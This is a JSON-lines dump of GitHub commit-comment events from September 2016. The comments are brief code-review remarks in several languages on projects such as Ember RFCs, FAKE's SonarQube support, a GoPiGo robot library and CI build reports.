{"id":"4598789388","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":19120316,"position":62,"line":0,"path":"HelloWorld/Miscellaneous/MemoryModel.cs","commit_id":"d55b4108c0d884841de5c23e0b09258912e125ed","created_at":"2016-09-21T20:39:34Z","updated_at":"2016-09-21T20:39:34Z","body":"Это третий этап: запуск или загрузка "}},"created_at":"2016-09-21T20:39:34Z"}
{"id":"4598791135","type":"CommitCommentEvent","actor":{"login":"Glavin001"},"repo":{"name":"Unibeautify/beautifier-prettydiff"},"payload":{"comment":{"id":19120320,"position":11,"line":95,"path":"src/index.js","commit_id":"aeadaaa3f82f553d42983d27b2596ba1e92ce453","created_at":"2016-09-21T20:39:51Z","updated_at":"2016-09-21T20:39:51Z","body":"`Typescript` should be `TypeScript`: https://github.com/Unibeautify/unibeautify/blob/master/src/languages.ts#L669\r\n"}},"created_at":"2016-09-21T20:39:51Z"}
{"id":"4598791364","type":"CommitCommentEvent","actor":{"login":"CleoQc"},"repo":{"name":"CleoQc/GoPiGo"},"payload":{"comment":{"id":19120321,"position":24,"line":208,"path":"Software/Python/gopigo.py","commit_id":"00327b61ff0e5819f9fb2914594ce06299e83fc9","created_at":"2016-09-21T20:39:54Z","updated_at":"2016-09-21T20:39:54Z","body":"turn_right() and turn_left() allow for an easy way to tell the GoPiGo to turn 90 degrees (or 45, or...)\r\nCode migrated from GoPiGoScratch.py"}},"created_at":"2016-09-21T20:39:54Z"}
{"id":"4598792011","type":"CommitCommentEvent","actor":{"login":"Glavin001"},"repo":{"name":"Unibeautify/beautifier-prettydiff"},"payload":{"comment":{"id":19120323,"position":39,"line":169,"path":"src/index.js","commit_id":"aeadaaa3f82f553d42983d27b2596ba1e92ce453","created_at":"2016-09-21T20:40:00Z","updated_at":"2016-09-21T20:40:00Z","body":"Change to `TypeScript`: https://github.com/Unibeautify/unibeautify/blob/master/src/languages.ts#L669"}},"created_at":"2016-09-21T20:40:00Z"}
{"id":"4598792240","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":19120324,"position":65,"line":0,"path":"HelloWorld/Miscellaneous/MemoryModel.cs","commit_id":"d55b4108c0d884841de5c23e0b09258912e125ed","created_at":"2016-09-21T20:40:02Z","updated_at":"2016-09-21T20:40:02Z","body":"А это четвертый этап: выполнение"}},"created_at":"2016-09-21T20:40:02Z"}
{"id":"4598794360","type":"CommitCommentEvent","actor":{"login":"mogoodrich"},"repo":{"name":"PIH/openmrs-module-mirebalais"},"payload":{"comment":{"id":19120327,"position":null,"line":null,"path":null,"commit_id":"7ef22b35da4622212ac5649b16aa271a8c9367ad","created_at":"2016-09-21T20:40:23Z","updated_at":"2016-09-21T20:40:23Z","body":"Sweet! So it just worked out of the box?"}},"created_at":"2016-09-21T20:40:23Z"}
{"id":"4598794730","type":"CommitCommentEvent","actor":{"login":"LarsAsplund"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19120329,"position":6,"line":33,"path":"src/math.vhdl","commit_id":"10eb07b7dd2e56a8fe88c75df39d57a4cb76c71a","created_at":"2016-09-21T20:40:27Z","updated_at":"2016-09-21T20:40:27Z","body":"Updated my example to \"ask\" the simulator for the maximum range. A simple testbench going a bit too complex... At least we raised the question on C interfaces. I'm also in favor of not going there, it's important that our test suites can be executed by anyone. These interfaces also brings complexity which we should avoid if we can (I know I failed miserably with that)\r\n"}},"created_at":"2016-09-21T20:40:27Z"}
{"id":"4598799962","type":"CommitCommentEvent","actor":{"login":"GalaticStryder"},"repo":{"name":"neobuddy89/shamu"},"payload":{"comment":{"id":19120340,"position":null,"line":null,"path":null,"commit_id":"699fed9b510c4e0f916beabcb414f2bf180e2dc5","created_at":"2016-09-21T20:41:24Z","updated_at":"2016-09-21T20:41:24Z","body":"That will fit perfectly on my GPU code, I'm using active_pwrlevel as 200MHz and getting a bit UI lag with some heavy launchers. Bumping it to default 320MHz will solve that ;)"}},"created_at":"2016-09-21T20:41:24Z"}
{"id":"4598801407","type":"CommitCommentEvent","actor":{"login":"YoloxPanda"},"repo":{"name":"dedicatedmemers/Kraken"},"payload":{"comment":{"id":19120343,"position":null,"line":null,"path":null,"commit_id":"f5ad56dedb6241165730b0f11a92390d6d8c7e6e","created_at":"2016-09-21T20:41:41Z","updated_at":"2016-09-21T20:41:41Z","body":"+1"}},"created_at":"2016-09-21T20:41:41Z"}
{"id":"4598801829","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"yuri13/bloc-jams2"},"payload":{"comment":{"id":19120346,"position":1,"line":1,"path":"styles/normalize.css-master/CHANGELOG.md","commit_id":"9f005053d53194fd38a8092dd7969a97498ddb44","created_at":"2016-09-21T20:41:45Z","updated_at":"2016-09-21T20:41:45Z","body":"I don't see any reason for you to include the changelogs or YML"}},"created_at":"2016-09-21T20:41:45Z"}
{"id":"4598803291","type":"CommitCommentEvent","actor":{"login":"Alexander01998"},"repo":{"name":"Wurst-Imperium/Wurst-Client-for-MC-1.10.X"},"payload":{"comment":{"id":19120347,"position":null,"line":null,"path":null,"commit_id":"0dd96ad4ad9420ec91281b5d2c43935430653def","created_at":"2016-09-21T20:42:00Z","updated_at":"2016-09-21T20:42:00Z","body":"Actually resolves Wurst-Imperium/Wurst-Client-Bugs#136"}},"created_at":"2016-09-21T20:42:00Z"}
{"id":"4598805420","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":19120351,"position":35,"line":0,"path":"HelloWorld/Miscellaneous/MemoryModel.cs","commit_id":"d55b4108c0d884841de5c23e0b09258912e125ed","created_at":"2016-09-21T20:42:23Z","updated_at":"2016-09-21T20:42:23Z","body":"Это точный код оригинала, но лучше его немного адаптировать под нашу текущую программу. Сейчас нет разделения на две отдельных функции и нет входных параметров. "}},"created_at":"2016-09-21T20:42:23Z"}
{"id":"4598806999","type":"CommitCommentEvent","actor":{"login":"raydittmeier"},"repo":{"name":"USGS-EROS/espa-product-formatter"},"payload":{"comment":{"id":19120355,"position":null,"line":null,"path":null,"commit_id":"550501dac048558b3cf4c7c38312b37036b2e5d7","created_at":"2016-09-21T20:42:41Z","updated_at":"2016-09-21T20:42:41Z","body":"The change looks good to me."}},"created_at":"2016-09-21T20:42:41Z"}
{"id":"4598808340","type":"CommitCommentEvent","actor":{"login":"nathanhammond"},"repo":{"name":"pzuraq/rfcs"},"payload":{"comment":{"id":19120358,"position":52,"line":26,"path":"active/0000-configuration-unification.md","commit_id":"8c7384ba8c7bc75a25291f99c49220f8ffd722ce","created_at":"2016-09-21T20:42:55Z","updated_at":"2016-09-21T20:42:55Z","body":"This is fantastic as an enumeration as it describes the measuring stick by which we should measure the success of the solution."}},"created_at":"2016-09-21T20:42:55Z"}
{"id":"4598808852","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19120360,"position":null,"line":null,"path":null,"commit_id":"74433cbb8e22190e75620292ea1cca2461d1dac0","created_at":"2016-09-21T20:43:01Z","updated_at":"2016-09-21T20:43:01Z","body":"update_standards_gem (asparke2) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-74433cbb8e22190e75620292ea1cca2461d1dac0-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-21T20:43:01Z"}
{"id":"4598809110","type":"CommitCommentEvent","actor":{"login":"mark-selyaeff"},"repo":{"name":"NikitaVishniakov/cs102"},"payload":{"comment":{"id":19120361,"position":53,"line":53,"path":"caesar.py","commit_id":"7389952c8b75a93326d220f96d5cde72ae1ad6a7","created_at":"2016-09-21T20:43:03Z","updated_at":"2016-09-21T20:43:03Z","body":"Нормально."}},"created_at":"2016-09-21T20:43:03Z"}
{"id":"4598818541","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"yuri13/bloc-jams2"},"payload":{"comment":{"id":19120393,"position":40,"line":30,"path":"index.html","commit_id":"9f005053d53194fd38a8092dd7969a97498ddb44","created_at":"2016-09-21T20:44:46Z","updated_at":"2016-09-21T20:44:46Z","body":"keep your quotation marks consistent as either single or double quotes"}},"created_at":"2016-09-21T20:44:46Z"}
{"id":"4598819071","type":"CommitCommentEvent","actor":{"login":"zuriy"},"repo":{"name":"silverbulleters/vanessa-agiler"},"payload":{"comment":{"id":19120397,"position":null,"line":null,"path":null,"commit_id":"69316565fbcf33047eeb3ce8dcedbca6da961685","created_at":"2016-09-21T20:44:52Z","updated_at":"2016-09-21T20:44:52Z","body":"Несовсем так, можно называться 1С:АвтоАджайлер пройдя процудура 1С совместимо.  \r\nА 1С-АвтоАджайлер это уже Совместный продукт."}},"created_at":"2016-09-21T20:44:52Z"}
{"id":"4598820017","type":"CommitCommentEvent","actor":{"login":"mauritsvanrees"},"repo":{"name":"collective/buildout.plonetest"},"payload":{"comment":{"id":19120400,"position":null,"line":null,"path":null,"commit_id":"664322e0a5f07ba13b30971bfca32d42125db86d","created_at":"2016-09-21T20:45:02Z","updated_at":"2016-09-21T20:45:02Z","body":"Right, this can be removed from any buildout config that uses zc.buildout 2.x."}},"created_at":"2016-09-21T20:45:02Z"}
{"id":"4598827950","type":"CommitCommentEvent","actor":{"login":"ClementVH"},"repo":{"name":"ClementVH/YoutubeDesktop"},"payload":{"comment":{"id":19120422,"position":22,"line":0,"path":"ts/notif.service.ts","commit_id":"968a6973df37fffa261136999773c675ac6b85a3","created_at":"2016-09-21T20:46:27Z","updated_at":"2016-09-21T20:46:27Z","body":"Reduce this time, notif stay too long"}},"created_at":"2016-09-21T20:46:27Z"}
{"id":"4598829065","type":"CommitCommentEvent","actor":{"login":"Gabrielle0915"},"repo":{"name":"sudatta0993/STAT_215_Project_1"},"payload":{"comment":{"id":19120425,"position":32,"line":71,"path":"equaldigit.py","commit_id":"2c945cdc9e0db59f600b4f7d5afc7bcdc15b7960","created_at":"2016-09-21T20:46:38Z","updated_at":"2016-09-21T20:46:38Z","body":"There are 2 ways to calculate the probability of percentage equal to or greater than the boundary.\nThe first one is 1 - binomial.cdf(boundary) + binomial.pdf(boundary).\nThe second one is 1 - binomial.cdf(boundary - 1)\nThese two methods get same results.\nI used the latter to calculate RTS and the former to calculate others.\nOn 周三, 9月 21, 2016 at 1:33 下午, tmaurer13 <notifications@github.com> wrote:\nWhy does the probability calculation for RTS include a binom.pdf, but none of the others do?\n\n—\nYou are receiving this because you are subscribed to this thread.\nReply to this email directly, view it on GitHub [https://github.com/sudatta0993/STAT_215_Project_1/commit/2c945cdc9e0db59f600b4f7d5afc7bcdc15b7960#commitcomment-19120235] , or mute the thread [https://github.com/notifications/unsubscribe-auth/AS5Rvdn41LuxPzPrBi-ag-2HeH96relZks5qsZSqgaJpZM4KDP0W] ."}},"created_at":"2016-09-21T20:46:38Z"}
{"id":"4598830492","type":"CommitCommentEvent","actor":{"login":"samtai1229"},"repo":{"name":"OSU-CS261-F16/assignment-0-samtai1229"},"payload":{"comment":{"id":19120429,"position":6,"line":4,"path":"README.md","commit_id":"bca142f59b0058b833203ae765601594fbd93ed0","created_at":"2016-09-21T20:46:52Z","updated_at":"2016-09-21T20:46:52Z","body":"Chia"}},"created_at":"2016-09-21T20:46:52Z"}
{"id":"4598832698","type":"CommitCommentEvent","actor":{"login":"andreasnoack"},"repo":{"name":"jeff-regier/Celeste.jl"},"payload":{"comment":{"id":19120433,"position":37,"line":230,"path":"src/source_division_inference.jl","commit_id":"0c69e48646808440430563a52c44542fbcf0fe7f","created_at":"2016-09-21T20:47:16Z","updated_at":"2016-09-21T20:47:16Z","body":"Sorry. Wrong link. I am on the `serialize` branch and the line seems to be the same \r\nhttps://github.com/kpamnany/Garbo.jl/blob/serialize/src/Garray.jl#L75"}},"created_at":"2016-09-21T20:47:16Z"}
{"id":"4598834131","type":"CommitCommentEvent","actor":{"login":"ClementVH"},"repo":{"name":"ClementVH/YoutubeDesktop"},"payload":{"comment":{"id":19120438,"position":3,"line":0,"path":"views/notif.component.html","commit_id":"968a6973df37fffa261136999773c675ac6b85a3","created_at":"2016-09-21T20:47:31Z","updated_at":"2016-09-21T20:47:31Z","body":"Add orderby pipe"}},"created_at":"2016-09-21T20:47:31Z"}
{"id":"4598839287","type":"CommitCommentEvent","actor":{"login":"knownasilya"},"repo":{"name":"knownasilya/ember-cli-deploy-gcloud-storage"},"payload":{"comment":{"id":19120453,"position":3,"line":2,"path":"libs/upload.js","commit_id":"e69439bcf1228904e9429e6b91d34597240b0c09","created_at":"2016-09-21T20:48:27Z","updated_at":"2016-09-21T20:48:27Z","body":"@olivierchatry could you give master a try?"}},"created_at":"2016-09-21T20:48:27Z"}
{"id":"4598839823","type":"CommitCommentEvent","actor":{"login":"nathanhammond"},"repo":{"name":"pzuraq/rfcs"},"payload":{"comment":{"id":19120454,"position":52,"line":26,"path":"active/0000-configuration-unification.md","commit_id":"8c7384ba8c7bc75a25291f99c49220f8ffd722ce","created_at":"2016-09-21T20:48:34Z","updated_at":"2016-09-21T20:48:34Z","body":"I feel like this might be missing discussion of two types of configuration:\r\n\r\n- Pull configuration: configuration which the engine directly queries its parent (app, addon, engine) or host.\r\n- Push configuration: configuration which the engine receives from its parent.\r\n\r\nPush config that crosses two levels maybe should be \"reexported\". Host => addon 1 => addon 2, addon 1 is responsible for configuring addon 2, host for addon 1 only? Unsure. This approach is valuable but also conflicts with your other goal:\r\n\r\n>  It should NOT allow conflicting addon configurations within a single container.\r\n"}},"created_at":"2016-09-21T20:48:34Z"}
{"id":"4598840328","type":"CommitCommentEvent","actor":{"login":"ronaldddilley"},"repo":{"name":"USGS-EROS/espa-product-formatter"},"payload":{"comment":{"id":19120457,"position":null,"line":null,"path":null,"commit_id":"550501dac048558b3cf4c7c38312b37036b2e5d7","created_at":"2016-09-21T20:48:39Z","updated_at":"2016-09-21T20:48:39Z","body":"ok, works for me"}},"created_at":"2016-09-21T20:48:39Z"}
{"id":"4598841448","type":"CommitCommentEvent","actor":{"login":"AtwooTM"},"repo":{"name":"fsharp/FAKE"},"payload":{"comment":{"id":19120459,"position":null,"line":null,"path":null,"commit_id":"688bf336f1af7e9f3b100811e6bbb8cfe8181463","created_at":"2016-09-21T20:48:51Z","updated_at":"2016-09-21T20:48:51Z","body":"Latest update is causing errors vs version 4.39.1.  Specifically, sonar settings now being flagged as errors:\r\n\r\nThis setting is not valid the \"end\" phase in this version of the C# plugin: sonar.log.level\r\nThis setting is not valid the \"end\" phase in this version of the C# plugin: sonar.verbose\r\nThis setting is not valid the \"end\" phase in this version of the C# plugin: sonar.branch\r\nThis setting is not valid the \"end\" phase in this version of the C# plugin: sonar.cs.xunit.reportsPaths\r\nThis setting is not valid the \"end\" phase in this version of the C# plugin: sonar.opencover.reportsPaths\r\n\r\nThis happens when calling SonarQube end.  Will open an issue and will note the issue number...\r\n"}},"created_at":"2016-09-21T20:48:51Z"}
{"id":"4598842360","type":"CommitCommentEvent","actor":{"login":"knownasilya"},"repo":{"name":"knownasilya/ember-cli-deploy-gcloud-storage"},"payload":{"comment":{"id":19120467,"position":null,"line":null,"path":null,"commit_id":"e69439bcf1228904e9429e6b91d34597240b0c09","created_at":"2016-09-21T20:49:02Z","updated_at":"2016-09-21T20:49:02Z","body":"@olivierchatry could you give master a try?"}},"created_at":"2016-09-21T20:49:02Z"}
{"id":"4598842655","type":"CommitCommentEvent","actor":{"login":"taion"},"repo":{"name":"facebook/relay"},"payload":{"comment":{"id":19120468,"position":null,"line":null,"path":null,"commit_id":"ba05332044ab8e68890f63a875514211ee480908","created_at":"2016-09-21T20:49:04Z","updated_at":"2016-09-21T20:49:04Z","body":"We are currently generating random dummy `clientMutationId` values to make our `RANGE_ADD` subscription updates work: https://github.com/edvinerikson/relay-subscriptions/blob/v1.0.0/src/updateStoreData.js#L20-L28. Otherwise we're sending `clientSubscriptionId` though. Does that sound right?"}},"created_at":"2016-09-21T20:49:04Z"}
{"id":"4598842803","type":"CommitCommentEvent","actor":{"login":"EwaPerzanowska"},"repo":{"name":"EwaPerzanowska/learning-sass"},"payload":{"comment":{"id":19120470,"position":null,"line":null,"path":null,"commit_id":"747d607d9fed3fd62fd9b2e1c48459d523352db6","created_at":"2016-09-21T20:49:06Z","updated_at":"2016-09-21T20:49:06Z","body":"Ok, zmieniłam \r\nAle dlaczego musiałam usunąć folder build z komputera?\r\nI na czym dokładnie polega działanie browserSync? powinna mi się aktualizować na bieżąco strona w przeglądarce? bo jak wpisuję zmiany w kodzie w edytorze, to nie widzę, żeby ze stroną coś się działo"}},"created_at":"2016-09-21T20:49:06Z"}
{"id":"4598845530","type":"CommitCommentEvent","actor":{"login":"ThomasKaiser"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19120474,"position":5,"line":22,"path":"config/sources/pine64.conf","commit_id":"b62ed03b96c3fe56282feebf5de7a73ada2014e2","created_at":"2016-09-21T20:49:35Z","updated_at":"2016-09-21T20:49:35Z","body":"Nope, slipped through by accident. But it doesn't matter, we have no cpufreq scaling with mainline kernel on A64 now but changing default governor to `schedutil` with 4.7 or above is the way to go since `ondemand` is considered being broken anyway."}},"created_at":"2016-09-21T20:49:35Z"}
{"id":"4598847041","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":19120480,"position":73,"line":0,"path":"HelloWorld/Miscellaneous/MemoryModel.cs","commit_id":"d55b4108c0d884841de5c23e0b09258912e125ed","created_at":"2016-09-21T20:49:50Z","updated_at":"2016-09-21T20:49:50Z","body":"На этом уровне лучше отставить оператор if как есть пока что. И внутри его веток делать присваивание значения переменной result. "}},"created_at":"2016-09-21T20:49:50Z"}
{"id":"4598848721","type":"CommitCommentEvent","actor":{"login":"DarkMorford"},"repo":{"name":"DarkMorford/scd-bios-disassembly"},"payload":{"comment":{"id":19120485,"position":null,"line":null,"path":null,"commit_id":"4a30f46a559c2c536ab5ac4588465881c5831e4c","created_at":"2016-09-21T20:50:08Z","updated_at":"2016-09-21T20:50:08Z","body":"Thanks for the tip! I'll definitely take a look at that and see what I can incorporate into this project."}},"created_at":"2016-09-21T20:50:08Z"}
{"id":"4598851784","type":"CommitCommentEvent","actor":{"login":"hbldh"},"repo":{"name":"hbldh/pymetawear"},"payload":{"comment":{"id":19120490,"position":null,"line":null,"path":null,"commit_id":"af4f924a8d6c9842c64a782b6769355977403843","created_at":"2016-09-21T20:50:40Z","updated_at":"2016-09-21T20:50:40Z","body":"@enlight3d The temperature module is implemented here as a first draft. Added cleaned-up example of what you sent me as example and added you to CONTRIBUTORS.md thanks to your help.\r\n\r\nI have, however, not tested this module with real hardware yet since I apparently misplaced my BL dongle somewhere. I will test it tomorrow and make some bugfixes then if needed."}},"created_at":"2016-09-21T20:50:40Z"}
{"id":"4598852477","type":"CommitCommentEvent","actor":{"login":"rlskoeser"},"repo":{"name":"emory-libraries/emory-baggins"},"payload":{"comment":{"id":19120495,"position":4,"line":18,"path":"baggins/baggers/lsdi.py","commit_id":"e8ac23eeb52cb91fda5c401357ade0896588da49","created_at":"2016-09-21T20:50:47Z","updated_at":"2016-09-21T20:50:47Z","body":"@alexBLR pretty sure we don't want the `nargs` option here.  I think we only want the user to specify one file, not zero or more, right?"}},"created_at":"2016-09-21T20:50:47Z"}
{"id":"4598858276","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"ajkeller34/Unitful.jl"},"payload":{"comment":{"id":19120524,"position":null,"line":null,"path":null,"commit_id":"5ea14982d1caf379d45ff35799122aeef395c462","created_at":"2016-09-21T20:51:51Z","updated_at":"2016-09-21T20:51:51Z","body":"this is going from the new style (what Pkg.generate creates) to an older style that we only used for a little while, it's better to have the way it was"}},"created_at":"2016-09-21T20:51:51Z"}
{"id":"4598858534","type":"CommitCommentEvent","actor":{"login":"sosey"},"repo":{"name":"spacetelescope/iraf_replacement"},"payload":{"comment":{"id":19120525,"position":null,"line":null,"path":null,"commit_id":"cc0fe62a73d9b40ddf9989c5db826d27c7a54a14","created_at":"2016-09-21T20:51:54Z","updated_at":"2016-09-21T20:51:54Z","body":"I see now - the stsci-hst is a metapackage being used to get at stsci.tools here by installing something that pulls it automatically.  I went around this and am just installing stsci.tools from git master and added astroconda as a channel to the conda build to grab hstcal. seems to work now.\r\n"}},"created_at":"2016-09-21T20:51:54Z"}
{"id":"4598858690","type":"CommitCommentEvent","actor":{"login":"rlskoeser"},"repo":{"name":"emory-libraries/emory-baggins"},"payload":{"comment":{"id":19120527,"position":9,"line":22,"path":"baggins/baggers/lsdi.py","commit_id":"e8ac23eeb52cb91fda5c401357ade0896588da49","created_at":"2016-09-21T20:51:55Z","updated_at":"2016-09-21T20:51:55Z","body":"Maybe worth revising the error message to make this clearer? (specify ids or a file?)"}},"created_at":"2016-09-21T20:51:55Z"}
{"id":"4598858968","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19120528,"position":null,"line":null,"path":null,"commit_id":"83800f3c8407b4567361598551c107ec24043279","created_at":"2016-09-21T20:51:58Z","updated_at":"2016-09-21T20:51:58Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-MacOS-10.9-clang: Tests Failed (1763 of 2333 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-83800f3c8407b4567361598551c107ec24043279-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-83800f3c8407b4567361598551c107ec24043279-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-75.57%25-red.svg)</a> \n"}},"created_at":"2016-09-21T20:51:58Z"}
{"id":"4598860172","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":19120531,"position":null,"line":null,"path":null,"commit_id":"deb528da4f280a448434f93042f1cde96dee5f93","created_at":"2016-09-21T20:52:11Z","updated_at":"2016-09-21T20:52:11Z","body":"I got these errors from worker.py:\r\n\r\n['/Users/stephane/Programmation/fishtest-master/worker/testing/cutechess-cli', '-repeat', '-rounds', '6', '-tournament', 'gauntlet', '-srand', '3751392933', '-resign', 'movecount=3', 'score=400', '-draw', 'movenumber=34', 'movecount=8', 'score=20', '-concurrency', '3', '-openings', u'file=2moves_v1.pgn', u'format=pgn', 'order=random', 'plies=16', '-engine', 'name=stockfish', 'cmd=stockfish', u'option.Hash=8', u'option.Center=7', u'option.InnerMid=6', u'option.InnerLong=-6', u'option.OuterMid=-7', u'option.Outer=7', u'option.OuterLong=-7', u'option.MidEdge=7', u'option.NearEdge=-6', u'option.FarEdge=7', u'option.Corner=-7', '-engine', 'name=base', 'cmd=base', u'option.Hash=8', u'option.Center=-7', u'option.InnerMid=-7', u'option.InnerLong=7', u'option.OuterMid=6', u'option.Outer=-7', u'option.OuterLong=7', u'option.MidEdge=-7', u'option.NearEdge=7', u'option.FarEdge=-6', u'option.Corner=7', '-each', 'proto=uci', 'tc=22.02+0.22', 'option.Threads=1']\r\n('TC limit', 220.23930376850095, 'End time:', datetime.datetime(2016, 9, 21, 22, 50, 40, 221031))\r\nIndexing opening suite...\r\nstockfish doesn't have option Center\r\nstockfish doesn't have option Corner\r\nstockfish doesn't have option FarEdge\r\nstockfish doesn't have option InnerLong\r\nstockfish doesn't have option InnerMid\r\nstockfish doesn't have option MidEdge\r\nstockfish doesn't have option NearEdge\r\nstockfish doesn't have option Outer\r\nstockfish doesn't have option OuterLong\r\nstockfish doesn't have option OuterMid\r\nbase doesn't have option Center\r\nbase doesn't have option Corner\r\nbase doesn't have option FarEdge\r\nbase doesn't have option InnerLong\r\nbase doesn't have option InnerMid\r\nbase doesn't have option MidEdge\r\nbase doesn't have option NearEdge\r\nbase doesn't have option Outer\r\nbase doesn't have option OuterLong\r\nbase doesn't have option OuterMid\r\n"}},"created_at":"2016-09-21T20:52:11Z"}
{"id":"4598863325","type":"CommitCommentEvent","actor":{"login":"hgwacha"},"repo":{"name":"hgwacha/This-is-my-ed"},"payload":{"comment":{"id":19120541,"position":1,"line":1,"path":"_texts/_Act343.md","commit_id":"129d0a2b4faaba5047774715aa5a6def43f21ca0","created_at":"2016-09-21T20:52:43Z","updated_at":"2016-09-21T20:52:43Z","body":"---\r\nlayout: narrative\r\ntitle: Act 343\r\nauthor: unknown scribe\r\nsource: Soissons, Bibliothèque municipale, MS 7\r\n---"}},"created_at":"2016-09-21T20:52:43Z"}
{"id":"4598865782","type":"CommitCommentEvent","actor":{"login":"nathanhammond"},"repo":{"name":"pzuraq/rfcs"},"payload":{"comment":{"id":19120549,"position":null,"line":null,"path":null,"commit_id":"8c7384ba8c7bc75a25291f99c49220f8ffd722ce","created_at":"2016-09-21T20:53:09Z","updated_at":"2016-09-21T20:53:09Z","body":"This sort of dynamic injection is something that I would like to get away from:\r\n\r\n```\r\nexport default Ember.Component.extend({\r\n   value: inject.config('my-app.environment.value')\r\n});\r\n```\r\n\r\nErgonomics of this approach though is fantastic. I'm unconvinced about the microsyntax you've proposed here; if doing this I want it to be a module name to address plus an actual value.\r\n\r\nI'd generally like to constrain that it may not be _truly_ dynamic."}},"created_at":"2016-09-21T20:53:09Z"}
{"id":"4598866102","type":"CommitCommentEvent","actor":{"login":"rlskoeser"},"repo":{"name":"emory-libraries/emory-baggins"},"payload":{"comment":{"id":19120552,"position":25,"line":38,"path":"baggins/baggers/lsdi.py","commit_id":"e8ac23eeb52cb91fda5c401357ade0896588da49","created_at":"2016-09-21T20:53:12Z","updated_at":"2016-09-21T20:53:12Z","body":"I think it makes more sense to do this in the `get_options` method, and error if there's a problem loading the file or getting the ids.  That way `process_items` can just assume everything is good and there are items to process."}},"created_at":"2016-09-21T20:53:12Z"}
{"id":"4598866638","type":"CommitCommentEvent","actor":{"login":"Magisus"},"repo":{"name":"glennsarti/facter"},"payload":{"comment":{"id":19120555,"position":8,"line":40,"path":"acceptance/lib/facter/acceptance/user_fact_utils.rb","commit_id":"1a6db3a52ee98cd818ce589abb9be167bb4cbf57","created_at":"2016-09-21T20:53:18Z","updated_at":"2016-09-21T20:53:18Z","body":"We actually had a question before whether this case was still necessary? Are we still supporting any platforms where this is necessary?"}},"created_at":"2016-09-21T20:53:18Z"}
{"id":"4598866776","type":"CommitCommentEvent","actor":{"login":"laedit"},"repo":{"name":"fsharp/FAKE"},"payload":{"comment":{"id":19120556,"position":null,"line":null,"path":null,"commit_id":"688bf336f1af7e9f3b100811e6bbb8cfe8181463","created_at":"2016-09-21T20:53:19Z","updated_at":"2016-09-21T20:53:19Z","body":"That is because the previous version forced to pass parameters to the end call, even if they were not used.\r\nThe only parameter used in the end call is `sonar.login`, you should remove the others.\r\nOr use `SonarqubeEnd()` if you haven't the use of `sonar.login`."}},"created_at":"2016-09-21T20:53:19Z"}
{"id":"4598873738","type":"CommitCommentEvent","actor":{"login":"rlskoeser"},"repo":{"name":"emory-libraries/emory-baggins"},"payload":{"comment":{"id":19120568,"position":39,"line":57,"path":"baggins/baggers/lsdi.py","commit_id":"e8ac23eeb52cb91fda5c401357ade0896588da49","created_at":"2016-09-21T20:54:34Z","updated_at":"2016-09-21T20:54:34Z","body":"I think there are more efficient ways to read a file into a list.  Some good answers on this stack overflow question: http://stackoverflow.com/questions/3277503/how-to-read-a-file-line-by-line-into-a-list-with-python"}},"created_at":"2016-09-21T20:54:34Z"}
{"id":"4598877429","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"pzion/Mongo.jl"},"payload":{"comment":{"id":19120582,"position":4,"line":6,"path":".travis.yml","commit_id":"659a3ef54555afaa9fee8c0feb94973d7a2c6664","created_at":"2016-09-21T20:55:15Z","updated_at":"2016-09-21T20:55:15Z","body":"this doesn't test 0.5 quite yet, but will soon - I need to go submit a PR to Travis and a bunch of PR's to packages"}},"created_at":"2016-09-21T20:55:15Z"}
{"id":"4598877670","type":"CommitCommentEvent","actor":{"login":"nathanhammond"},"repo":{"name":"pzuraq/rfcs"},"payload":{"comment":{"id":19120583,"position":null,"line":null,"path":null,"commit_id":"8c7384ba8c7bc75a25291f99c49220f8ffd722ce","created_at":"2016-09-21T20:55:17Z","updated_at":"2016-09-21T20:55:17Z","body":"> As children should have no knowledge of there parent\r\n\r\n```diff\r\n+ their\r\n- there\r\n```"}},"created_at":"2016-09-21T20:55:17Z"}
{"id":"4598885532","type":"CommitCommentEvent","actor":{"login":"nathanhammond"},"repo":{"name":"pzuraq/rfcs"},"payload":{"comment":{"id":19120619,"position":null,"line":null,"path":null,"commit_id":"8c7384ba8c7bc75a25291f99c49220f8ffd722ce","created_at":"2016-09-21T20:56:42Z","updated_at":"2016-09-21T20:56:42Z","body":"> addons instantiated within this container from accessing the Host's configuration without knowing its name.\r\n\r\n`this.parent.name` or `this._findHost().name` is an escape valve."}},"created_at":"2016-09-21T20:56:42Z"}
{"id":"4598885949","type":"CommitCommentEvent","actor":{"login":"ajkeller34"},"repo":{"name":"ajkeller34/Unitful.jl"},"payload":{"comment":{"id":19120621,"position":null,"line":null,"path":null,"commit_id":"5ea14982d1caf379d45ff35799122aeef395c462","created_at":"2016-09-21T20:56:46Z","updated_at":"2016-09-21T20:56:46Z","body":"Just updated it (twice more), better?"}},"created_at":"2016-09-21T20:56:46Z"}
